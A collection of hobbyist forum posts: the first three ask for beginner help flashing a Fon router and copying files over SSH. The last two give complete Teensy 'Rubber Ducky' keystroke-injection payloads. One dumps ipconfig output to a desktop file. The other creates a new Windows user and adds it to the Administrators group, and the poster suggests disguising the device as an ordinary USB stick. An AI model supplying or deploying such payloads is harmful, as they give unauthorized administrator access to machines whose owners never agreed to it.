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  1. Hi I have run into a problem while following the tutorial for I can't telnet into the fon as I don't know the password. Should I still use root with admin as a password to login after flashing the fon with the new firmware?
  2. Thank you very much. Yes I am playing around with Linux for a couple of weeks now. Becouse as you noticed up till now a run into a lot of problems. Never the less I would like to ask you how it is possible to copy the files to the fon using putty in windows. I was able to log into the router only I don't know how to use the scp command. I put the two files into the c: directory. Hope you can help me with this.
  3. Hi I am a complete noob. And after i have spend ages on downgrading my secondhand fon I now finally started with the guide. But I am tuning in to a problem in step 8. I have no idea how to copy those files to /temp/. Could someone help me with this? I have been googeling al night but I just can't get it to work. I am completely new to ssh.
  4. void setup() { WindowsCommandRun("cmd"); delay(1000); ExecuteCommand("ipconfig"); delay(1000); EditCMD(KEY_S); delay(1000); EditCMD(KEY_Y); delay(1000); ExecuteCommand("exit"); delay(1000); WindowsCommandRun("notepad.exe"); delay(1000); Keyboard.print("Ducky was here, and found an ip-config:"); delay(1000); KeyCombo(MODIFIERKEY_CTRL,KEY_V); KeyCombo(MODIFIERKEY_CTRL,KEY_S); delay(1000); Keyboard.print("Ip-config File"); delay(1000); KeyPress(KEY_ENTER); delay(1000); KeyCombo(MODIFIERKEY_ALT,KEY_F4); delay(1000); } void loop(){} void WindowsCommandRun(char *SomeCommand) { KeyCombo(MODIFIERKEY_GUI,KEY_R); delay(1000); Keyboard.print(SomeCommand); KeyPress(KEY_ENTER); } void KeyPress(int SomeKey) { Keyboard.set_key1(SomeKey); Keyboard.send_now(); ClearKeys(); } void KeyCombo(int ModKey,int SomeKey) { Keyboard.set_modifier(ModKey); Keyboard.set_key1(SomeKey); Keyboard.send_now(); ClearKeys; } void ExecuteCommand(char *SomeCommand) { Keyboard.print(SomeCommand); delay(500); KeyPress(KEY_ENTER); } void ClearKeys() { Keyboard.set_modifier(0); Keyboard.set_key1(0); Keyboard.set_key2(0); Keyboard.set_key3(0); Keyboard.send_now(); } void EditCMD(int SomeKey) { KeyCombo(MODIFIERKEY_ALT,KEY_SPACE); KeyPress(KEY_E); KeyPress(SomeKey); } This code copy's the Ip-config found with CMD to a notepad file and then saves it as an text file on the desktop. and although this might not be that usefull it does show the possibility of copying and pasting inside CMD. I only tested it in XP but it should work on all windows boxes.
  5. Hi everybody, After hearing from the ducky i decided i had to learn how to write at least some simple codes. So i started playing with the teensy and understand the basic concepts of writing a code. After looking at all the codes found on the forum, the wiki and on irongeek i started building up my own code as you can see it contains a lot of the codes already made, and although i don't exactly know who's codes i used. Credits to all of you. I would greatly appriciate tips on how to improve the code and on how to keep it as short as possible. The code makes and saves an notepad file on the desktop. After that it build a new administrator account (worked for me on windows xp, but got denied on vista even when on a administrator account) and finaly starts this forum. int ledPin = 11; void setup() { pinMode(ledPin, OUTPUT); } void loop() { //Led on while executing payload delay(5000); digitalWrite(ledPin, HIGH); //Open notepad WindowsCommandRun("notepad.exe"); delay(1000); Keyboard.print("Ducky was here"); delay(1000); //Save file KeyCombo(MODIFIERKEY_CTRL,KEY_S); delay(1000); Keyboard.print("The Ducky file"); delay(1000); KeyPress(KEY_ENTER); delay(1000); //Close notepad KeyCombo(MODIFIERKEY_ALT,KEY_F4); delay(1000); //Add an administrator account WindowsCommandRun("cmd"); delay(1000); ExecuteCommand("net user RubberDucky RubberDucky /add"); delay(200); ExecuteCommand("net localgroup Administrators RubberDucky /add"); delay(200); ExecuteCommand("exit"); delay(1000); //Open the forum WindowsCommandRun("http://www.hak5.org/forums/index.php?showforum=56"); delay(1000); //Switch led off digitalWrite(ledPin, LOW); while(1) { } } void WindowsCommandRun(char *SomeCommand) { KeyCombo(MODIFIERKEY_GUI,KEY_R); delay(1000); ExecuteCommand(SomeCommand); } void KeyPress(int SomeKey) { Keyboard.set_key1(SomeKey); Keyboard.send_now(); Keyboard.set_key1(0); Keyboard.send_now(); } void KeyCombo(int ModKey,int SomeKey) { Keyboard.set_modifier(ModKey); Keyboard.set_key1(SomeKey); Keyboard.send_now(); Keyboard.set_modifier(0); Keyboard.set_key1(0); Keyboard.send_now(); } void ExecuteCommand(char *SomeCommand) { Keyboard.print(SomeCommand); delay(500); KeyPress(KEY_ENTER); } Next to the code i have been thinking about how the Ducky would best work. And i am convinced it would work best when disguised as an USB stick. therefor i think we schould really get the sd card to work so that when first plugged in it would look like an USB storage device. After this it could be activated with a button. As i said i am competely new to all of this but i will do my best to help in every way i can. Hope this was oke for my first post and code.
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